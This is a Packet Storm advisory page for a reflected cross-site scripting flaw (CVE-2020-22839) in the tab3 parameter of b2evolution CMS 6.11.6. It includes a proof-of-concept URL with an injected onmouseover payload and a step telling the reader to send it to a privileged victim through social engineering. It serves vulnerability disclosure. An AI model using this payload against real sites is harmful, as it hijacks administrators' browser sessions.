Lucene search
Nakul RattiPACKETSTORM:161363HistoryFeb 10, 2021 - 12:00 a.m.
b2evolution CMS 6.11.6 Cross Site Scripting
2021-02-1000:00:00
Nakul Ratti
packetstormsecurity.com
245
0.007 Low
EPSS
Percentile
79.8%
`# Exploit Title: *Reflected XSS in b2evolution CMS 6.11.6 via tab3
parameter in evoadm.php*
# CVE : *CVE-2020-22839*
# Date: 10/02/2021
# Exploit Author: Nakul Ratti, Soham Bakore
# Vendor Homepage: https://b2evolution.net/
# Software Link:
https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
Vulnerable File:
--------------------------
http://host/evoadm.php
Vulnerable Issue:
--------------------------
Tab3 parameter has no input validation.
--------------------------Proof of Concept-----------------------
Steps to Reproduce:
1. Send the following URL *http://HOST/evoadm.php <http://host/evoadm.php>?*
*.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1*
to
the logged in victim using any social engineering technique.
2. When an unsuspecting user with high privileges opens this URL, XSS will
be triggered which will execute the malicious javascript payload in users
browser.
3. The vulnerable parameter in this case is “*tab3*”.
`
Related
exploitdb
exploitdb
b2evolution 6.11.6 - 'tab3' Reflected XSS
2021-02-11 00:00:00
osv
osv
CVE-2020-22839
2021-02-09 20:15:12
nvd
nvd
CVE-2020-22839
2021-02-09 20:15:12
prion
prion
Cross site scripting
2021-02-09 20:15:00
cvelist
cvelist
CVE-2020-22839
2021-02-09 19:39:05
cve
cve
CVE-2020-22839
2021-02-09 20:15:12
openvas
openvas
b2evolution < 6.11.7 Multiple Vulnerabilities
2021-02-11 00:00:00